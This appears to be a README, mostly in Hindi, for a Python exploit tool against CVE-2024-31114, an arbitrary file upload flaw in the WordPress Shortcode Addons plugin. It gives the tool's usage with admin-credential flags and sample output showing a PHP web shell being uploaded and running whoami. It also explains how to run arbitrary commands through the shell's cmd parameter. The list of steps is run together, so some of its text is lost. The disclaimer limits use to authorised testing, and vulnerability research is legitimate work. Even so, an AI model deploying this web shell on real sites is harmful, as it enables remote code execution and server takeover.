
Shortcode Addons <= 3.2.5 - प्रमाणित (Admin+) मनमानी फ़ाइल अपलोड
शॉर्टकोड ऐडऑन्स <= 3.2.5 – प्रमाणित (एडमिन+) मनमानी फ़ाइल अपलोड
CVE आईडी: CVE-2024-31114
CVSS स्कोर: 9.1 (गंभीर)
वर्डप्रेस के लिए शॉर्टकोड ऐडऑन्स – विज़ुअल कम्पोज़र, डिवी, बीवर बिल्डर और एलिमेंटर एक्सटेंशन प्लगइन फ़ाइल प्रकार सत्यापन के अभाव के कारण सभी संस्करणों 3.2.5 तक में मनमानी फ़ाइल अपलोड के लिए संवेदनशील है।
यह दोष प्रमाणित हमलावरों को जिनके पास प्रशासक-स्तरीय पहुँच या उच्चतर है को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देता है — जो रिमोट कोड निष्पादन (RCE) का कारण बन सकता है।
यह पायथन स्क्रिप्ट कमजोरी के शोषण को स्वचालित करती है। यह निम्न कार्य करती है:
_wpnonce) निकालनाnxploit.php) जनरेट करना.zip के रूप में संपीड़ित और अपलोड करनाwhoami निष्पादित करनाusage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target URL (e.g. http://target.com)
-un, --username USERNAME WordPress Admin Username
-p, --password PASSWORD WordPress Admin Password
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
पेलोड अपलोड होने के बाद, आप निम्नलिखित प्रारूप का उपयोग करके सिस्टम कमांड निष्पादित कर सकते हैं:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
🔹 उदाहरण:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
यह सर्वर पर वर्तमान निर्देशिका की सामग्री सूचीबद्ध करेगा।
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
लेखक इस स्क्रिप्ट के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर जिनका परीक्षण करने की आपको स्पष्ट अनुमति है।
द्वारा: Nxploited | Khaled Alenazi